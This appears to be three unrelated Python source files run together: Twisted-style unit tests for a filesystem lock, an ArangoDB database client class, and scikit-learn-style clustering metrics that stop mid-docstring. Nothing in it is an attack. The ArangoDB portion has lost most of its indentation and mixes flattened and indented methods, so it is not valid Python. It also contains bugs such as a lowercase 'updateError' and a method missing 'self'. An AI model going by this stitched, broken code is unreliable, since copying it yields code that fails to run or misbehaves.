        """
        Verify that when L{lockfile.kill} does end up as None (e.g. on Windows
        without pywin32), it doesn't end up being called and raising a
        L{TypeError}.
        """
        self.patch(lockfile, "kill", None)
        fl = lockfile.FilesystemLock(self.mktemp())
        fl.lock()
        self.assertFalse(fl.lock())
class LockingTests(unittest.TestCase):
    """
    Tests for acquiring and releasing L{lockfile.FilesystemLock}, including
    the platform-specific error paths of the underlying symlink/readlink/
    rmlink/kill helpers.
    """
    def _symlinkErrorTest(self, errno):
        # Make the lock's symlink attempt fail with the given errno and
        # assert the error propagates out of lock().
        def fakeSymlink(source, dest):
            raise OSError(errno, None)
        self.patch(lockfile, 'symlink', fakeSymlink)
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        exc = self.assertRaises(OSError, lock.lock)
        self.assertEqual(exc.errno, errno)
    def test_symlinkError(self):
        """
        An exception raised by C{symlink} other than C{EEXIST} is passed up to
        the caller of L{FilesystemLock.lock}.
        """
        self._symlinkErrorTest(errno.ENOSYS)
    def test_symlinkErrorPOSIX(self):
        """
        An L{OSError} raised by C{symlink} on a POSIX platform with an errno of
        C{EACCES} or C{EIO} is passed to the caller of L{FilesystemLock.lock}.
        On POSIX, unlike on Windows, these are unexpected errors which cannot
        be handled by L{FilesystemLock}.
        """
        self._symlinkErrorTest(errno.EACCES)
        self._symlinkErrorTest(errno.EIO)
    if platform.isWindows():
        test_symlinkErrorPOSIX.skip = (
            "POSIX-specific error propagation not expected on Windows.")
    def test_cleanlyAcquire(self):
        """
        If the lock has never been held, it can be acquired and the C{clean}
        and C{locked} attributes are set to C{True}.
        """
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        self.assertTrue(lock.lock())
        self.assertTrue(lock.clean)
        self.assertTrue(lock.locked)
    def test_cleanlyRelease(self):
        """
        If a lock is released cleanly, it can be re-acquired and the C{clean}
        and C{locked} attributes are set to C{True}.
        """
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        self.assertTrue(lock.lock())
        lock.unlock()
        self.assertFalse(lock.locked)
        lock = lockfile.FilesystemLock(lockf)
        self.assertTrue(lock.lock())
        self.assertTrue(lock.clean)
        self.assertTrue(lock.locked)
    def test_cannotLockLocked(self):
        """
        If a lock is currently locked, it cannot be locked again.
        """
        lockf = self.mktemp()
        firstLock = lockfile.FilesystemLock(lockf)
        self.assertTrue(firstLock.lock())
        secondLock = lockfile.FilesystemLock(lockf)
        self.assertFalse(secondLock.lock())
        self.assertFalse(secondLock.locked)
    def test_uncleanlyAcquire(self):
        """
        If a lock was held by a process which no longer exists, it can be
        acquired, the C{clean} attribute is set to C{False}, and the
        C{locked} attribute is set to C{True}.
        """
        owner = 12345
        def fakeKill(pid, signal):
            if signal != 0:
                raise OSError(errno.EPERM, None)
            if pid == owner:
                raise OSError(errno.ESRCH, None)
        lockf = self.mktemp()
        self.patch(lockfile, 'kill', fakeKill)
        # Simulate the stale lock left behind by the dead "owner" process.
        lockfile.symlink(str(owner), lockf)
        lock = lockfile.FilesystemLock(lockf)
        self.assertTrue(lock.lock())
        self.assertFalse(lock.clean)
        self.assertTrue(lock.locked)
        self.assertEqual(lockfile.readlink(lockf), str(os.getpid()))
    def test_lockReleasedBeforeCheck(self):
        """
        If the lock is initially held but then released before it can be
        examined to determine if the process which held it still exists, it is
        acquired and the C{clean} and C{locked} attributes are set to C{True}.
        """
        def fakeReadlink(name):
            # Pretend to be another process releasing the lock.
            lockfile.rmlink(lockf)
            # Fall back to the real implementation of readlink.
            readlinkPatch.restore()
            return lockfile.readlink(name)
        readlinkPatch = self.patch(lockfile, 'readlink', fakeReadlink)
        def fakeKill(pid, signal):
            if signal != 0:
                raise OSError(errno.EPERM, None)
            if pid == 43125:
                raise OSError(errno.ESRCH, None)
        self.patch(lockfile, 'kill', fakeKill)
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        lockfile.symlink(str(43125), lockf)
        self.assertTrue(lock.lock())
        self.assertTrue(lock.clean)
        self.assertTrue(lock.locked)
    def test_lockReleasedDuringAcquireSymlink(self):
        """
        If the lock is released while an attempt is made to acquire
        it, the lock attempt fails and C{FilesystemLock.lock} returns
        C{False}. This can happen on Windows when L{lockfile.symlink}
        fails with L{IOError} of C{EIO} because another process is in
        the middle of a call to L{os.rmdir} (implemented in terms of
        RemoveDirectory) which is not atomic.
        """
        def fakeSymlink(src, dst):
            # While another process id doing os.rmdir which the Windows
            # implementation of rmlink does, a rename call will fail with EIO.
            raise OSError(errno.EIO, None)
        self.patch(lockfile, 'symlink', fakeSymlink)
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        self.assertFalse(lock.lock())
        self.assertFalse(lock.locked)
    if not platform.isWindows():
        test_lockReleasedDuringAcquireSymlink.skip = (
            "special rename EIO handling only necessary and correct on "
            "Windows.")
    def test_lockReleasedDuringAcquireReadlink(self):
        """
        If the lock is initially held but is released while an attempt
        is made to acquire it, the lock attempt fails and
        L{FilesystemLock.lock} returns C{False}.
        """
        def fakeReadlink(name):
            # While another process is doing os.rmdir which the
            # Windows implementation of rmlink does, a readlink call
            # will fail with EACCES.
            raise IOError(errno.EACCES, None)
        self.patch(lockfile, 'readlink', fakeReadlink)
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        lockfile.symlink(str(43125), lockf)
        self.assertFalse(lock.lock())
        self.assertFalse(lock.locked)
    if not platform.isWindows():
        test_lockReleasedDuringAcquireReadlink.skip = (
            "special readlink EACCES handling only necessary and correct on "
            "Windows.")
    def _readlinkErrorTest(self, exceptionType, errno):
        # Make readlink fail with the given exception type/errno while the
        # lock file appears held, and assert lock() propagates it.
        def fakeReadlink(name):
            raise exceptionType(errno, None)
        self.patch(lockfile, 'readlink', fakeReadlink)
        lockf = self.mktemp()
        # Make it appear locked so it has to use readlink
        lockfile.symlink(str(43125), lockf)
        lock = lockfile.FilesystemLock(lockf)
        exc = self.assertRaises(exceptionType, lock.lock)
        self.assertEqual(exc.errno, errno)
        self.assertFalse(lock.locked)
    def test_readlinkError(self):
        """
        An exception raised by C{readlink} other than C{ENOENT} is passed up to
        the caller of L{FilesystemLock.lock}.
        """
        self._readlinkErrorTest(OSError, errno.ENOSYS)
        self._readlinkErrorTest(IOError, errno.ENOSYS)
    def test_readlinkErrorPOSIX(self):
        """
        Any L{IOError} raised by C{readlink} on a POSIX platform passed to the
        caller of L{FilesystemLock.lock}.
        On POSIX, unlike on Windows, these are unexpected errors which cannot
        be handled by L{FilesystemLock}.
        """
        self._readlinkErrorTest(IOError, errno.ENOSYS)
        self._readlinkErrorTest(IOError, errno.EACCES)
    if platform.isWindows():
        test_readlinkErrorPOSIX.skip = (
            "POSIX-specific error propagation not expected on Windows.")
    def test_lockCleanedUpConcurrently(self):
        """
        If a second process cleans up the lock after a first one checks the
        lock and finds that no process is holding it, the first process does
        not fail when it tries to clean up the lock.
        """
        def fakeRmlink(name):
            rmlinkPatch.restore()
            # Pretend to be another process cleaning up the lock.
            lockfile.rmlink(lockf)
            # Fall back to the real implementation of rmlink.
            return lockfile.rmlink(name)
        rmlinkPatch = self.patch(lockfile, 'rmlink', fakeRmlink)
        def fakeKill(pid, signal):
            if signal != 0:
                raise OSError(errno.EPERM, None)
            if pid == 43125:
                raise OSError(errno.ESRCH, None)
        self.patch(lockfile, 'kill', fakeKill)
        lockf = self.mktemp()
        lock = lockfile.FilesystemLock(lockf)
        lockfile.symlink(str(43125), lockf)
        self.assertTrue(lock.lock())
        self.assertTrue(lock.clean)
        self.assertTrue(lock.locked)
    def test_rmlinkError(self):
        """
        An exception raised by L{rmlink} other than C{ENOENT} is passed up
        to the caller of L{FilesystemLock.lock}.
        """
        def fakeRmlink(name):
            raise OSError(errno.ENOSYS, None)
        self.patch(lockfile, 'rmlink', fakeRmlink)
        def fakeKill(pid, signal):
            if signal != 0:
                raise OSError(errno.EPERM, None)
            if pid == 43125:
                raise OSError(errno.ESRCH, None)
        self.patch(lockfile, 'kill', fakeKill)
        lockf = self.mktemp()
        # Make it appear locked so it has to use readlink
        lockfile.symlink(str(43125), lockf)
        lock = lockfile.FilesystemLock(lockf)
        exc = self.assertRaises(OSError, lock.lock)
        self.assertEqual(exc.errno, errno.ENOSYS)
        self.assertFalse(lock.locked)
    def test_killError(self):
        """
        If L{kill} raises an exception other than L{OSError} with errno set to
        C{ESRCH}, the exception is passed up to the caller of
        L{FilesystemLock.lock}.
        """
        def fakeKill(pid, signal):
            raise OSError(errno.EPERM, None)
        self.patch(lockfile, 'kill', fakeKill)
        lockf = self.mktemp()
        # Make it appear locked so it has to use readlink
        lockfile.symlink(str(43125), lockf)
        lock = lockfile.FilesystemLock(lockf)
        exc = self.assertRaises(OSError, lock.lock)
        self.assertEqual(exc.errno, errno.EPERM)
        self.assertFalse(lock.locked)
    def test_unlockOther(self):
        """
        L{FilesystemLock.unlock} raises L{ValueError} if called for a lock
        which is held by a different process.
        """
        lockf = self.mktemp()
        # A lock held by "some other pid".
        lockfile.symlink(str(os.getpid() + 1), lockf)
        lock = lockfile.FilesystemLock(lockf)
        self.assertRaises(ValueError, lock.unlock)
    def test_isLocked(self):
        """
        L{isLocked} returns C{True} if the named lock is currently locked,
        C{False} otherwise.
        """
        lockf = self.mktemp()
        self.assertFalse(lockfile.isLocked(lockf))
        lock = lockfile.FilesystemLock(lockf)
        self.assertTrue(lock.lock())
        self.assertTrue(lockfile.isLocked(lockf))
        lock.unlock()
        self.assertFalse(lockfile.isLocked(lockf))
| |
import json
import types

import collection as COL
import graph as GR
from document import Document
from graph import Graph
from query import AQLQuery
from theExceptions import AQLQueryError, CreationError, UpdateError
class Database(object) :
def __init__(self, connection, name) :
"meant to be called by the connection only"
self.name = name
self.connection = connection
self.collections = {}
self.URL = '%s/_db/%s/_api' % (self.connection.arangoURL, self.name)
self.collectionsURL = '%s/collection' % (self.URL)
self.cursorsURL = '%s/cursor' % (self.URL)
self.explainURL = '%s/explain' % (self.URL)
self.graphsURL = "%s/gharial" % self.URL
self.collections = {}
self.graphs = {}
self.reload()
def reloadCollections(self) :
"reloads the collection list."
r = self.connection.session.get(self.collectionsURL)
data = r.json()
if r.status_code == 200 :
self.collections = {}
for colData in data["collections"] :
colName = colData['name']
if colData['isSystem'] :
colObj = COL.SystemCollection(self, colData)
else :
try :
colClass = COL.getCollectionClass(colName)
colObj = colClass(self, colData)
except KeyError :
colObj = COL.GenericCollection(self, colData)
self.collections[colName] = colObj
else :
raise updateError(data["errorMessage"], data)
def reloadGraphs(self) :
"reloads the graph list"
r = self.connection.session.get(self.graphsURL)
data = r.json()
if r.status_code == 200 :
self.graphs = {}
for graphData in data["graphs"] :
try :
self.graphs[graphData["_key"]] = GR.getGraphClass(graphData["_key"])(self, graphData)
except KeyError :
self.graphs[graphData["_key"]] = Graph(self, graphData)
else :
raise UpdateError(data["errorMessage"], data)
def reload(self) :
"reloads collections and graphs"
self.reloadCollections()
self.reloadGraphs()
def createCollection(self, className = 'GenericCollection', waitForSync = False, **colArgs) :
"""Creeats a collection and returns it.
ClassName the name of a class inheriting from Collection or Egdes. Use colArgs to put things such as 'isVolatile = True' (see ArangoDB's doc
for a full list of possible arugments)."""
if className != 'GenericCollection' :
colArgs['name'] = className
else :
if 'name' not in colArgs :
raise ValueError("a 'name' argument mush be supplied if you want to create a generic collection")
colClass = COL.getCollectionClass(className)
if colArgs['name'] in self.collections :
raise CreationError("Database %s already has a collection named %s" % (self.name, colArgs['name']) )
if issubclass(colClass, COL.Edges) :
colArgs["type"] = COL.COLLECTION_EDGE_TYPE
else :
colArgs["type"] = COL.COLLECTION_DOCUMENT_TYPE
colArgs["waitForSync"] = waitForSync
payload = json.dumps(colArgs)
r = self.connection.session.post(self.collectionsURL, data = payload)
data = r.json()
if r.status_code == 200 and not data["error"] :
col = colClass(self, data)
self.collections[col.name] = col
return self.collections[col.name]
else :
raise CreationError(data["errorMessage"], data)
def fetchDocument(self, _id) :
"fetchs a document using it's _id"
sid = _id.split("/")
return self[sid[0]][sid[1]]
def createGraph(self, name, createCollections = True) :
"""Creates a graph and returns it. 'name' must be the name of a class inheriting from Graph.
You can decide weither or not you want non existing collections to be created by setting the value of 'createCollections'.
If the value if 'false' checks will be performed to make sure that every collection mentionned in the edges definition exist. Raises a ValueError in case of
a non-existing collection."""
def _checkCollectionList(lst) :
for colName in lst :
if not COL.isCollection(colName) :
raise ValueError("'%s' is not a defined Collection" % colName)
graphClass = GR.getGraphClass(name)
ed = []
for e in graphClass._edgeDefinitions :
if not createCollections :
if not COL.isEdgeCollection(e.edgesCollection) :
raise ValueError("'%s' is not a defined Edge Collection" % e.edgesCollection)
_checkCollectionList(e.fromCollections)
_checkCollectionList(e.toCollections)
ed.append(e.toJson())
if not createCollections :
_checkCollectionList(graphClass._orphanedCollections)
payload = {
"name": name,
"edgeDefinitions": ed,
"orphanCollections": graphClass._orphanedCollections
}
payload = json.dumps(payload)
r = self.connection.session.post(self.graphsURL, data = payload)
data = r.json()
if r.status_code == 201 :
self.graphs[name] = graphClass(self, data["graph"])
else :
raise CreationError(data["errorMessage"], data)
return self.graphs[name]
# def _checkGraphCollections(self, edgeDefinitions, orphanCollections) :
# for ed in edgeDefinitions :
# checkList(ed["from"])
# checkList(ed["to"])
# checkList(orphanCollections)
def hasCollection(self, name) :
"""returns true if the databse has a collection by the name of 'name'"""
return name in self.collections
def hasGraph(name):
"""returns true if the databse has a graph by the name of 'name'"""
return name in self.graphs
def AQLQuery(self, query, batchSize=0, rawResults=False, bindVars=None, options=None, count=False, fullCount=False):
    """Run an AQL query and return an AQLQuery result object.

    Set rawResults=True if you want the query to return dictionaries
    instead of Document objects.

    Fixed: 'bindVars' and 'options' previously defaulted to shared mutable
    dicts ({}); they now default to None and are replaced by fresh empty
    dicts per call, which is backward compatible for all callers.
    """
    if bindVars is None:
        bindVars = {}
    if options is None:
        options = {}
    # 'AQLQuery' here resolves to the module-level query class, not this method.
    return AQLQuery(self, query, rawResults=rawResults, batchSize=batchSize,
                    bindVars=bindVars, options=options, count=count, fullCount=fullCount)
def explainAQLQuery(self, query, allPlans=False):
    """Return the server's explanation of 'query'.

    Setting allPlans to True makes ArangoDB return all possible plans;
    False returns only the optimal plan.
    """
    body = json.dumps({'query': query, 'allPlans': allPlans})
    # renamed local from 'request' to avoid shadowing common names
    response = self.connection.session.post(self.explainURL, data=body)
    return response.json()
def validateAQLQuery(self, query, bindVars=None, options=None):
    """Return the server's answer if the query is valid; raise AQLQueryError if not.

    Fixed: 'bindVars' and 'options' previously defaulted to shared mutable
    dicts ({}); they now default to None and are replaced by fresh empty
    dicts per call (backward compatible). Also fixed the docstring typo
    ("answer is the query" -> "answer if the query").
    """
    if bindVars is None:
        bindVars = {}
    if options is None:
        options = {}
    payload = {'query': query, 'bindVars': bindVars, 'options': options}
    r = self.connection.session.post(self.cursorsURL, data=json.dumps(payload))
    data = r.json()
    if r.status_code == 201 and not data["error"]:
        return data
    raise AQLQueryError(data["errorMessage"], query, data)
def __repr__(self):
    """Readable representation showing the database name."""
    return "ArangoDB database: %s" % self.name
def __getitem__(self, collectionName):
    """Return the collection named 'collectionName' (use: database[collectionName]).

    On a cache miss the database is reloaded once and the lookup retried;
    KeyError is raised if the collection is still unknown.
    """
    if collectionName not in self.collections:
        # one reload to pick up collections created since the last fetch
        self.reload()
    try:
        return self.collections[collectionName]
    except KeyError:
        raise KeyError("Can't find any collection named : %s" % collectionName)
class DBHandle(Database) :
    """Lazy stand-in for a Database.

    Loading a full Database triggers the loading of the collections and
    graphs within it, so only lightweight handles are created up front;
    the real Database is initialized on first attribute access.
    """
    def __init__(self, connection, name) :
        # Deliberately does NOT call Database.__init__: only stores what is
        # needed to build the full Database later.
        self.connection = connection
        self.name = name
    def __getattr__(self, k) :
        # Invoked only for attributes missing on the handle. Promote this
        # object in place into a fully loaded Database, then retry the
        # lookup. Database.__getattribute__ is used throughout to avoid
        # re-entering this __getattr__ recursively.
        name = Database.__getattribute__(self, 'name')
        connection = Database.__getattribute__(self, 'connection')
        Database.__init__(self, connection, name)
        return Database.__getattribute__(self, k)
| |
"""Utilities to evaluate the clustering performance of models
Functions named as *_score return a scalar value to maximize: the higher the
better.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>
# Wei LI <kuantkid@gmail.com>
# Diego Molla <dmolla-aliod@gmail.com>
# License: BSD 3 clause
from math import log
import numpy as np
from scipy.misc import comb
from scipy.sparse import coo_matrix
from .expected_mutual_info_fast import expected_mutual_information
from ...utils.fixes import bincount
def comb2(n):
    """Return the number of unordered pairs among *n* items, i.e. C(n, 2).

    The exact integer variant of ``comb`` is faster for k == 2, so it is
    used by default throughout this module instead of the float
    approximation.
    """
    return comb(n, 2, exact=1)
def check_clusterings(labels_true, labels_pred):
    """Coerce both labelings to arrays and check they are matching 1D arrays.

    Raises ValueError when either labeling is not one-dimensional or when
    the two do not contain the same number of samples.
    """
    labels_true = np.asarray(labels_true)
    labels_pred = np.asarray(labels_pred)

    # same dimensionality check for both inputs
    for name, arr in (("labels_true", labels_true), ("labels_pred", labels_pred)):
        if arr.ndim != 1:
            raise ValueError("%s must be 1D: shape is %r" % (name, arr.shape))

    if labels_true.shape != labels_pred.shape:
        raise ValueError(
            "labels_true and labels_pred must have same size, got %d and %d"
            % (labels_true.shape[0], labels_pred.shape[0]))
    return labels_true, labels_pred
def contingency_matrix(labels_true, labels_pred, eps=None, max_n_classes=5000):
    """Build a contingency matrix describing the relationship between labels.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate

    eps : None or float
        If a float, that value is added to all values in the contingency
        matrix. This helps to stop NaN propagation.
        If ``None``, nothing is adjusted.

    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled for contingency_matrix.
        This helps to avoid MemoryError with regression targets
        for mutual_information.

    Returns
    -------
    contingency : array, shape=[n_classes_true, n_classes_pred]
        Matrix :math:`C` such that :math:`C_{i, j}` is the number of samples
        in true class :math:`i` and in predicted class :math:`j`. If
        ``eps is None``, the dtype of this array will be integer. If ``eps``
        is given, the dtype will be float.
    """
    classes, class_idx = np.unique(labels_true, return_inverse=True)
    clusters, cluster_idx = np.unique(labels_pred, return_inverse=True)
    n_classes = classes.shape[0]
    n_clusters = clusters.shape[0]
    if n_classes > max_n_classes:
        raise ValueError("Too many classes for a clustering metric. If you "
                         "want to increase the limit, pass parameter "
                         "max_n_classes to the scoring function")
    if n_clusters > max_n_classes:
        raise ValueError("Too many clusters for a clustering metric. If you "
                         "want to increase the limit, pass parameter "
                         "max_n_classes to the scoring function")
    # Using coo_matrix to accelerate simple histogram calculation,
    # i.e. bins are consecutive integers.
    # Currently, coo_matrix is faster than histogram2d for simple cases.
    # Fixed: ``dtype=int`` replaces ``dtype=np.int`` — the ``np.int`` alias
    # was a plain alias of the builtin int and is removed in NumPy >= 1.24
    # (AttributeError), so behavior is unchanged on older NumPy too.
    contingency = coo_matrix((np.ones(class_idx.shape[0]),
                              (class_idx, cluster_idx)),
                             shape=(n_classes, n_clusters),
                             dtype=int).toarray()
    if eps is not None:
        # don't use += as contingency is integer
        contingency = contingency + eps
    return contingency
# clustering measures
def adjusted_rand_score(labels_true, labels_pred, max_n_classes=5000):
    """Rand index adjusted for chance.

    The Rand Index computes a similarity measure between two clusterings by
    considering all pairs of samples and counting pairs that are assigned
    consistently in the predicted and true clusterings. The raw RI is then
    "adjusted for chance"::

        ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)

    The ARI is close to 0.0 for random labelings independently of the
    number of clusters and samples, and exactly 1.0 for identical
    clusterings (up to a permutation). It is a symmetric measure:
    ``adjusted_rand_score(a, b) == adjusted_rand_score(b, a)``.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError / OS
        freeze on degenerate (e.g. regression) targets.

    Returns
    -------
    ari : float
        Similarity score between -1.0 and 1.0. Random labelings score close
        to 0.0; 1.0 stands for a perfect match.

    References
    ----------
    .. [Hubert1985] L. Hubert and P. Arabie, Comparing Partitions,
       Journal of Classification 1985
    .. [wk] http://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index

    See also
    --------
    adjusted_mutual_info_score: Adjusted Mutual Information
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_samples = labels_true.shape[0]
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit cases: no clustering since the data is not split, or
    # trivial clustering where each sample gets its own cluster. These are
    # perfect matches, hence 1.0.
    if n_classes == n_clusters and n_clusters in (0, 1, n_samples):
        return 1.0

    contingency = contingency_matrix(labels_true, labels_pred,
                                     max_n_classes=max_n_classes)

    # ARI from the pair counts of the contingency table.
    sum_comb_c = sum(comb2(n_c) for n_c in contingency.sum(axis=1))
    sum_comb_k = sum(comb2(n_k) for n_k in contingency.sum(axis=0))
    sum_comb = sum(comb2(n_ij) for n_ij in contingency.flatten())

    prod_comb = (sum_comb_c * sum_comb_k) / float(comb(n_samples, 2))
    mean_comb = (sum_comb_k + sum_comb_c) / 2.
    return (sum_comb - prod_comb) / (mean_comb - prod_comb)
def homogeneity_completeness_v_measure(labels_true, labels_pred,
                                       max_n_classes=5000):
    """Compute the homogeneity, completeness and V-Measure scores at once.

    These metrics are based on normalized conditional entropy measures of
    the clustering labeling given ground-truth class labels. A clustering
    is homogeneous if every cluster contains only members of a single
    class, and complete if all members of a given class end up in the same
    cluster. Both scores lie in [0, 1], larger being better, and are
    independent of the absolute label values. V-Measure is symmetric in
    its two arguments; homogeneity and completeness are not.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    homogeneity : float
        Score between 0.0 and 1.0; 1.0 is perfectly homogeneous labeling.
    completeness : float
        Score between 0.0 and 1.0; 1.0 is perfectly complete labeling.
    v_measure : float
        Harmonic mean of the first two.

    See also
    --------
    homogeneity_score
    completeness_score
    v_measure_score
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)

    # Empty data: all three scores default to perfect.
    if len(labels_true) == 0:
        return 1.0, 1.0, 1.0

    h_classes = entropy(labels_true)
    h_clusters = entropy(labels_pred)
    mi = mutual_info_score(labels_true, labels_pred,
                           max_n_classes=max_n_classes)

    homogeneity = mi / h_classes if h_classes else 1.0
    completeness = mi / h_clusters if h_clusters else 1.0

    if homogeneity + completeness == 0.0:
        v_measure = 0.0
    else:
        v_measure = 2.0 * homogeneity * completeness / (homogeneity + completeness)
    return homogeneity, completeness, v_measure
def homogeneity_score(labels_true, labels_pred, max_n_classes=5000):
    """Homogeneity metric of a cluster labeling given a ground truth.

    A clustering satisfies homogeneity if all of its clusters contain only
    data points which are members of a single class. The score lies in
    [0, 1], 1.0 meaning perfectly homogeneous. It is independent of the
    absolute label values but NOT symmetric: swapping ``labels_true`` and
    ``labels_pred`` yields the :func:`completeness_score` instead.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    homogeneity : float
        Score between 0.0 and 1.0; 1.0 stands for perfectly homogeneous
        labeling.

    References
    ----------
    .. [1] Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
       conditional entropy-based external cluster evaluation measure.

    See also
    --------
    completeness_score
    v_measure_score
    """
    homogeneity, _, _ = homogeneity_completeness_v_measure(
        labels_true, labels_pred, max_n_classes)
    return homogeneity
def completeness_score(labels_true, labels_pred, max_n_classes=5000):
    """Completeness metric of a cluster labeling given a ground truth.

    A clustering satisfies completeness if all the data points that are
    members of a given class are elements of the same cluster. The score
    lies in [0, 1], 1.0 meaning perfectly complete. It is independent of
    the absolute label values but NOT symmetric: swapping ``labels_true``
    and ``labels_pred`` yields the :func:`homogeneity_score` instead.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    completeness : float
        Score between 0.0 and 1.0; 1.0 stands for perfectly complete
        labeling.

    References
    ----------
    .. [1] Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
       conditional entropy-based external cluster evaluation measure.

    See also
    --------
    homogeneity_score
    v_measure_score
    """
    _, completeness, _ = homogeneity_completeness_v_measure(
        labels_true, labels_pred, max_n_classes)
    return completeness
def v_measure_score(labels_true, labels_pred, max_n_classes=5000):
    """V-measure of a cluster labeling given a ground truth.

    This score is identical to :func:`normalized_mutual_info_score`. The
    V-measure is the harmonic mean of homogeneity and completeness::

        v = 2 * (homogeneity * completeness) / (homogeneity + completeness)

    It is independent of the absolute label values and symmetric: swapping
    ``labels_true`` and ``labels_pred`` returns the same value, which makes
    it useful for comparing two independent label assignments on the same
    data when no ground truth is known.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    v_measure : float
        Score between 0.0 and 1.0; 1.0 stands for a perfectly complete
        labeling.

    References
    ----------
    .. [1] Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
       conditional entropy-based external cluster evaluation measure.

    See also
    --------
    homogeneity_score
    completeness_score
    """
    _, _, v_measure = homogeneity_completeness_v_measure(
        labels_true, labels_pred, max_n_classes)
    return v_measure
def mutual_info_score(labels_true, labels_pred, contingency=None,
                      max_n_classes=5000):
    """Mutual Information between two clusterings.

    The Mutual Information measures the similarity between two labelings of
    the same data; it equals the Kullback-Leibler divergence of the joint
    distribution with the product of the marginals. It is independent of
    the absolute label values and symmetric in its two label arguments.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    contingency : None or array, shape = [n_classes_true, n_classes_pred]
        A contingency matrix given by the :func:`contingency_matrix`
        function. If ``None`` it is computed; otherwise the given value is
        used and ``labels_true`` / ``labels_pred`` are ignored.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    mi : float
        Mutual information, a non-negative value.

    See also
    --------
    adjusted_mutual_info_score: Adjusted against chance Mutual Information
    normalized_mutual_info_score: Normalized Mutual Information
    """
    if contingency is None:
        labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
        contingency = contingency_matrix(labels_true, labels_pred,
                                         max_n_classes=max_n_classes)
    contingency = np.array(contingency, dtype='float')

    total = np.sum(contingency)
    marginal_true = np.sum(contingency, axis=1)
    marginal_pred = np.sum(contingency, axis=0)
    outer = np.outer(marginal_true, marginal_pred)

    nonzero = contingency != 0.0
    cells = contingency[nonzero]
    log_cells = np.log(cells)
    cells /= total  # normalized joint probabilities
    # log(a / b) is computed as log(a) - log(b) to limit precision loss
    log_outer = (-np.log(outer[nonzero])
                 + log(marginal_true.sum()) + log(marginal_pred.sum()))
    mi = cells * (log_cells - log(total)) + cells * log_outer
    return mi.sum()
def adjusted_mutual_info_score(labels_true, labels_pred, max_n_classes=5000):
    """Adjusted Mutual Information between two clusterings.

    AMI adjusts the Mutual Information for chance: the MI is generally
    higher for clusterings with more clusters regardless of actual shared
    information. For clusterings U and V::

        AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]

    The score is independent of the absolute label values and symmetric in
    its two label arguments. Note this function is an order of magnitude
    slower than other metrics such as the Adjusted Rand Index.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    ami : float (upper-limited by 1.0)
        1.0 when the two partitions are identical (perfectly matched);
        random (independent) partitions score around 0 on average and can
        be negative.

    References
    ----------
    .. [1] Vinh, Epps, and Bailey, (2010). Information Theoretic Measures
       for Clusterings Comparison: Variants, Properties, Normalization and
       Correction for Chance, JMLR.
    .. [2] http://en.wikipedia.org/wiki/Adjusted_Mutual_Information

    See also
    --------
    adjusted_rand_score: Adjusted Rand Index
    mutual_information_score: Mutual Information (not adjusted for chance)
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_samples = labels_true.shape[0]
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit cases: no clustering since the data is not split
    # (single class/cluster, or empty input) — a perfect match.
    if n_classes == n_clusters and n_clusters in (0, 1):
        return 1.0

    contingency = contingency_matrix(labels_true, labels_pred,
                                     max_n_classes=max_n_classes)
    contingency = np.array(contingency, dtype='float')

    # MI of the two clusterings, its expected value under the null, and
    # the entropies of each labeling.
    mi = mutual_info_score(labels_true, labels_pred, contingency=contingency)
    emi = expected_mutual_information(contingency, n_samples)
    h_true, h_pred = entropy(labels_true), entropy(labels_pred)
    return (mi - emi) / (max(h_true, h_pred) - emi)
def normalized_mutual_info_score(labels_true, labels_pred, max_n_classes=5000):
    """Normalized Mutual Information between two clusterings.

